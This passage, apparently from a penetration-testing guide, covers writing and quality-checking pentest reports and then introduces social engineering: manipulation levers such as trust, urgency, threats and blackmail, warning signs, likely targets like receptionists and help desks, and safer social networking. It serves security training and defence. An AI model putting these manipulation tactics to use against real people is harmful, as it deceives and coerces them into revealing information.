The Impact area explains the impact of a possible exploit. The impact of an exploit always depends on how severe the outcomes will be. For example, a reflected cross-site scripting in a login parameter will have a higher impact than a reflected cross-site scripting in a search parameter. So it is important to analyze and represent the impact of the attack based on the tested environment.
The Likelihood area explains the likelihood of an exploit. Likelihood always depends on how easy, publicly available, credible, and inter-action dependent that attack is. By interaction dependent, I mean whether it’s possible to perform that attack without having any human intervention and authorization. For example, the likelihood of an arbitrary code execution attack by Metasploit will be higher than the likelihood of a privilege escalation attack.
The Risk Evaluation area is where the final level of risk should be determined based on vulnerability, threat, impact, and the likelihood of the attack. After risk evaluation, the pentester should write and create a respective finding by flagging the risk level.
Presenting a piece of vulnerability in your findings without documenting in a Recommendations section how the vulnerability could be managed means you’ve done only half of your security assessment job.
At the end of this process, you should expect to have produced at least two reports to be delivered and/or presented to the client. One report should be more in-depth technical and targeted toward staff who have their primary focus on risk mitigation strategies. The second report should be less technically oriented in nature and be intended for senior management for business purposes and long-term strategy development.
The client may ask for the reports to be delivered digitally and thus no other actions are required. Or the client may request a formal presentation to be delivered to technical staff and management. Additionally, the client may ask for you, the pentester, to work with technical staff to develop solutions and strategies to the problems you discovered.
Adding Supporting Documentation
Supporting information is all the information that is helpful for explaining all the exploits, but report and remediation of exploits should not depend directly on this information.
The following information can be included in your report as supporting data:
Methodology In this section, list the methodology you used for conducting the testing. For example, you could reference the Penetration Testing Execution Standard (PTES) here. Tools In this section list all the tools you used for testing. This section explains how many resources you used for the vulnerability assessment project.
A report’s primary purpose is to show everything that you have done and how successfully you have cracked your client’s security. A report describes vulnerabilities in their environment and what steps they should take. But sometimes you want a place to give more generalized and detailed explanation—and the appendix is that place.
References Sometimes you will find yourself in a situation where you can not do a demonstration of an attack. In that case, you can use the work of other researchers and authors as a reference. You do not have all the time in the world to write every single detail, but by providing references you present a real scenario of the exploit.
Glossary A pen testing report is an outcome of a complete technical procedure that mostly revolves around highly technical terms. For management people, you should create a glossary of the technical terms at the end of the report that gives simple definitions of all the technical terms.
Conducting Quality Assurance
We are human and humans make mistakes, but our clients may not appreciate that, and for IT security they will not appreciate even a negligible mistake. So after you write your first report—which is basically a draft report because it has not been through quality assurance—it should be reviewed by yourself or, ideally, by an additional member of your staff.
Technical quality assurance is a kind of very short pen test. During a regular pen test, there could be various possibilities, such as the pentester forgetting to check some vulnerabilities, misunderstanding some vulnerabilities, or failing to document some vulnerabilities properly. So, technical quality assurance is there to assure the quality of the report and the project in technical terms.
Technical quality assurance should assure that the pentester has checked for every obvious possibility. An example is when the tester has checked a login page for XSS attacks, brute-force attacks, and password policy but forgot to do a check for SQL injection, user enumeration, and other possible attacks.
Web applications could be highly vulnerable. Another example is when the tester has reported a web information disclosure vulnerability but has not reported an unpatched web server in use. The technical quality assurance phase should make sure that every possible pen test has been done based on the given time-frame for assessment.
Technical quality assurance should make sure that the pentester has not misunderstood any vulnerability and raised a wrong flag. For example, say the tester reported a cross-site scripting vulnerability where a SQL error was received in response—possibly the tester misunderstood the possibility for a SQL injection attack.
Another goal of technical quality assurance is to assure the quality of the report. You can have various types of clients; some of them can be from an intensive technical background and some of them could be new to the industry. So keep every type of audience in mind and try to write as detailed an explanatory report as possible. Normally reports should include definitions, cause, proof, risk evaluation, solutions, and references for possible attacks. All these points should be written with simplicity and detailed explanation.
Introduction to Social Engineering
Social engineering is a term that is frequently encountered on newscasts and articles in magazines and other places. But even though it is used a lot, it is typically not very clearly defined. Social engineering is a technique used to interact with human beings for the purpose of gaining information that can be used to reach a specific objective.
In practice, social engineering can be a potent tool in the hands of an individual who knows how to put the techniques to the best use. Social engineering sharing, by targeting human beings, is going after the weakest part of any system. Technology, policies and procedures, and other measures can be effective, but the reality is that a human being can be tricked or coerced or otherwise made to reveal information.
Social engineering is an effective tool that, once mastered, can be employed during several points of the pentesting process. That’s because social engineering targets human beings and humans are deeply involved in all aspects of business and technology. Remember that after reviewing this blog, you can incorporate the methods anywhere and anytime during your process of gaining information.
So what types of information do social engineers typically keep an eye out for? Well, there are a lot of different types of information that can be of use to a social engineer—anything from personal information, organization information, project information, financial information, technical data, employee names, passwords, operational information, and anything else that may catch the attention of the engineer. A simple email address, for example, can reveal a user’s login name.
Social engineering is effective for a number of different reasons, each of which can be addressed depending on whether you are the defender or the attacker. Let’s take a look at each:
Lack of a Technological Fix Technology can do a lot of things and do it quite well, but one of the things it is not so good at is stopping the impact of social engineering. While technology is more than capable of assisting in slowing or nullifying some of the impact of social engineering attacks, it is not 100 percent effective in every case and thus needs to be supplemented with proper training and awareness.
Difficult Detection Social engineering is very difficult to detect in many cases. Although someone may appear to be asking questions or having a casual conversation, they could, in fact, be collecting information either directly or indirectly for later use.
Lack of Training Many companies fail to provide regular security awareness training, which could easily go a long way toward addressing many of the issues that threaten security such as social engineering.
How does a social engineer gain access to information through a human being? As a social engineer, you won't get the victim to reveal information, and commonly this is done by getting the person to drop their guard and trust you. Whatever information that the victim reveals may be useful at that time or may be valuable in fine-tuning a later attack. Let’s look at how to exploit human traits in the next section.
Exploiting Human Traits
When thinking of social engineers, it usually helps to consider them in the same context as you would a con artist. As you may be aware, a con artist is a type of person who can make use of a scam or situation to build a relationship with the victim and then later exploit that relationship to achieve a specific result.
Generally, anyone who engages in activity that would be considered social engineering is good at interacting with people, thinks very quickly on their feet, can understand body language, is able to read the verbal cues in a conversation, and just overall understands how human beings work and communicate.
Social engineers are then able to pull all that information together to do their manipulation. While there are a number of things a social engineer can do to be successful, let’s break these approaches down to a small number of commonly used techniques:
Moral Obligation An attacker using moral obligation is able to make use of the tendency of people to want to help other people. For example, a social engineer might craft a story that states a certain charity or cause is looking for volunteers, making the target provide information to register to help the cause.
Trust One of the key behaviors in human beings that can be exploited to great success by social engineers is that of trust. Trust is a behavior that is built into people from the time they’re born. By understanding that human beings have a fundamental tendency to trust, social engineers find a way to gain that trust, which might mean sharing information with the victim or possibly even dressing in a certain manner that encourages trust.
Threats A social engineer may threaten a victim if they do not comply with a request. Now, this can be a tricky one for social engineers to achieve without setting off any alarms. A social engineer using threats may be subtle, or they may be bold in suggesting that the victim may get in trouble for not providing assistance.
For example, a social engineer might suggest that a noncompliant victim may be reported to their manager for failing to provide assistance when asked. However, if threats are used carelessly, the result could be the opposite, with a victim deciding that they don’t want to help. Or the threat could raise enough suspicion that the attack loses its ability to be kept secret.
Something for Nothing The attacker may promise a victim that for little or no work, they will benefit from assisting the attacker. The attacker may convince a victim that they’ll get a good word put in for them or gain some recognition as a result of their help.
Urgency Social engineers may force the victim into taking an action by planting the belief that they have limited time to act before the opportunity is gone. Making a victim act by telling them they have a limited time to respond can be a big motivator. Essentially, what urgency, sometimes called scarcity, is attempting to do is increase the stress on a victim—perhaps making them take certain actions or do certain things that they wouldn’t do if they had time to think about the situation.
For example, say you are in a restaurant and can’t decide what to order off the menu. You finally narrow your choices down to three. If you are given unlimited time to think about it, you will eventually choose which one of the three items you want and be done with it. However, if the situation is changed to one where a decision between those three items has to be made within the next 60 seconds, then it becomes harder to make a decision. In some cases the decision that you make will leave you wondering whether you made the right one.
Blackmail or Extortion Blackmail or extortion can prove effective at gaining information from a victim. For example, knowing that a victim has a gambling problem or engages in some other form of embarrassing or addictive behavior can be used against the victim.
Acting Like a Social Engineer
Signs of a potential social engineering–based attack can be many. Here are some common signs of such an attack being attempted:
Use of Authority An attacker may make overt references to who they are or who they know, or even make threats based on their claimed power or authority. Typically a victim can tell when someone is trying to abuse them with authority. An attacker will frequently go overboard with tactics such as name-dropping, and it becomes quite obvious that they are trying to intimidate or scare the victim into doing what they want. A victim who is aware of the use of authority as a way to compel compliance may not only stop an attack but also inform company security.
Inability to Give Valid Contact Information A victim may ask the attacker to provide information so they can be contacted as a follow-up or in response to a question. If the attacker has not prepared properly, they will try to avoid the issue, provide bogus details, or possibly cause a lot when responding to questions.
Using the Buddy System This involves making informal or “off-the-books” requests designed to encourage the victim to give out information that they may not otherwise. While it’s not uncommon for people to be asked to do favors or little off-the-blog things here and there for one another in a work-place, sometimes it is a signal that there might be something else going on. Individuals asking for too many off-the-book requests in a relatively short time may be trying to get around security controls and possibly even exploit trust with the victim.
VIP or Name Dropping Excessive name dropping is an uncommon thing to see in today’s world, but it can be used to gain trust and confidence from an organization. However, most people recognize that excessive name dropping not only is on the annoying side of things but can also be an indication that there’s more to the situation.
Stroking the Ego Excessive use of praise or compliments designed to flatter a victim is a sure sign that something is going on. While it’s not always a bad thing to hear a lot of praise coming from an individual, a victim needs to be on guard because too much praise can lead to the intended victim dropping their guard and letting their ego take over, thus making them more likely to reveal best-kept secrets.
Discomfort or uneasiness when questioned doesn’t always mean that the individual being questioned is a bad person or up to mischief; it may just mean that person is not comfortable with being asked questions. However, some people when questioned will struggle for an answer and may avoid answering or even try to change the subject in an effort to keep from having to answer a query that the victim is posing.
Targeting Specific Victims
An attacker will look for targets of opportunity that have the most to offer. Some common targets include receptionists, help desk personnel, users, executives, system administrators, outside vendors, and even maintenance personnel.
Remember that anyone inside an organization can be a victim of social engineering, but some people are much more likely to be targets based on the information they may have in their head or how accessible they are. The following list shows some likely candidates for targeting by social engineers but definitely not the only ones.
Receptionists—the first people visitors encounter in many companies—represent prime targets. They see many people go in and out of an office, and they hear a lot of things. In addition, receptionists are meant to be helpful and therefore are not security focused. Establishing a rapport with these individuals can easily yield information that’s useful on its own or for future attacks.
Remember that receptionists don’t always just act as receptionists; they may have other responsibilities. They may also do such tasks as writing reports and working on projects. Thus the information they handle may be well above and beyond just a sign-in sheet and company directory.
Helpdesk personnel offer another tempting and valuable target because of the information they may have about infrastructure, among other things. Filing fake support requests or asking these personnel leading questions can yield valuable information.
Keep in mind that while help desk people are a viable target for a social engineering attack they may not always have good or detailed information about a network and its infrastructure. Help desk people are usually easy to contact, but they typically are not the ones who are responsible for maintaining the network and systems on it, so the information they have will be limited.
System administrators can also be valuable targets of opportunity, again because of the information they possess. The typical administrator can be counted on to have high-level knowledge of infrastructure and applications and future plans. Given the right enticements and some effort, these targets can sometimes yield tremendous amounts of information.
Executives are a valuable source of information and a prime target for attackers because individuals in these types of positions are not focused on security. In fact, many of the people in these positions focus on business processes, sales, finance, and other areas. Don’t let the fact that an executive may not have technical data dissuade you from targeting them because they can have other viable information about their organization that is just as helpful and may have that piece of information that helps you hit a home run as far as your testing goes.
Users are probably one of the biggest sources of leaks because they are the ones who handle, process and manage information from day to day. Also, many of these individuals may be less than prepared for dealing with this information safely.
New employees who are not trained to recognize social engineering attacks are a prime target. Cleaning crews that may work off-hours such as at night can prove to be effective targets. Keep in mind that they have detailed information about a facility and its people, and present a great opportunity to ask questions.
Leveraging Social Networking
One of the biggest developments in technology on the web over the past decade or more has been that of social networking and social media. The technologies and services that fit within this area allow individuals to share information either to everyone or to their friends with a few button clicks.
The users of these services do everything from share postings on a wall on what they’re thinking or what they’re doing at work to sharing photos and other details that may not be the best to post on a public forum. It is because of this practice that these services present a valuable target in your quest to gain information from human beings. How many other places are you aware of that the users of the service freely share information without giving it a second thought?
The rapid growth of social networking technologies lets millions of users each day post on Facebook, Twitter, Instagram, and many other networks. A huge amount of information exists on these social networks, and this makes them a good source data.
The danger of making this wealth of information available is that a curious attacker can easily piece together clues from these sources and create a much clearer picture of a target. With this information in hand, the attacker can make a convincing impersonation of that individual or gain entry into a business by using insider information.
When employees post information on social networks or other sites, it should always be with a mind toward how valuable the information may be in the wrong hands and whether it is worth posting. It is easy to search social networks and find information that an individual may have unwittingly shared.
Social networking gives employees the ability to quickly and easily spread information without giving it much thought initially. Corporations have become aware that their employees can post literally anything they want and just about anyone may be able to access and view that company’s dirty laundry.
Social media can be made safer if simple steps are taken to strengthen accounts. In fact, it has been found in many cases that with a little care and effort, steps can be taken to lessen or avoid many common security issues and risks.
Conducting Safer Social Networking
Because social networking increased in popularity so quickly, there has been little time to deal with the evolving problems the technology brought to bear. The public has become aware of the dangers and has learned how serious the danger is and that they need to take steps to protect themselves. Company policies should address the appropriate use of social media, such as the kind of conduct and language an employee is allowed to use on these sites.
Social networking can be used relatively safely and securely as long as it is used carefully. Exercising some basic safety measures can substantially reduce the risk of using these services. As a pentester, you can train users on the following practices if a client opts to include this in the contract:
Discourage the practice of mixing personal and professional information in social networking situations. Although you may not be able to eliminate the company information that is shared, it should be kept to a bare minimum.
Avoid reusing passwords across multiple social networking sites or locations to avoid mass compromise. Don’t post just anything online; remember that anything posted can be found, sometimes years later.
Avoid posting personal information that can be used to determine more about you, impersonate you, or coax someone to reveal additional information about you.
Avoid publishing any identifying personal information online, including phone numbers; pictures of home, work, or family members; or anything that may be used to determine identity.
Be aware that with such systems anything published online will stay online, even if it is removed by the publisher. In essence, once something is put online, it never goes away. Stay up-to-date on the use of privacy features on sites such as Facebook. Instruct employees in the presence of phishing scams on social networks and how to avoid and report them.